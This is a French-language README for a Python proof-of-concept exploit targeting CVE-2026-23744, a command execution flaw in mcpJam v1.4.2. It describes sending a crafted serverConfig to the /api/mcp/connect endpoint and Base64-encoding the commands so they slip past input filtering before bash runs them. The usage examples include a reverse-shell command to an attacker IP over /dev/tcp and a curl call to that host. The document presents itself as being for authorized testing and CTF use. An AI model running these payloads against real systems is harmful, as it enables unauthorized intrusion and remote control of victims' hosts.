
cve-2026-23744 python exploit
Un exploit de preuve de concept en Python 3 pour CVE-2026-23744, une vulnérabilité d'exécution arbitraire de commandes affectant mcpJam v1.4.2.
Cet utilitaire automatise la livraison du payload en encodant les commandes en Base64 de manière transparente avant leur transmission, ce qui aide à contourner les mécanismes restrictifs de validation des entrées et de filtrage des caractères. Le payload est décodé et exécuté via un wrapper /bin/bash sur le système cible.
Les commandes sont automatiquement encodées avant la transmission, ce qui améliore la fiabilité lorsqu'on cible des applications appliquant une validation stricte des entrées ou des restrictions de caractères.
Prend en charge l'exécution arbitraire de commandes, notamment :
sh, bash, nc, etc.)Affiche :
Cela simplifie le dépannage et la validation de l'exploit.
Supprime les avertissements de vérification de certificat, permettant d'interagir avec des cibles qui utilisent des certificats SSL auto-signés ou non fiables.
Installez la dépendance requise :
pip install requests
python3 exploit.py <target_url> "<command>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
L'exploit cible le point de terminaison /api/mcp/connect en créant un objet serverConfig malveillant.
Au lieu de transmettre les commandes directement, le payload est transformé en chaîne encodée en Base64 et exécuté via Bash :
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
Cette approche permet d'échapper au filtrage au niveau de l'application tout en garantissant que le payload est décodé et exécuté entièrement sur l'hôte cible.
serverConfig.base64 -d./bin/bash.[!WARNING] Ce projet est fourni uniquement à des fins éducatives, pour des évaluations de sécurité autorisées et pour les environnements Capture The Flag (CTF).
Toute utilisation non autorisée contre des systèmes pour lesquels vous ne disposez pas d'une autorisation explicite est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques découlant de l'utilisation de ce logiciel.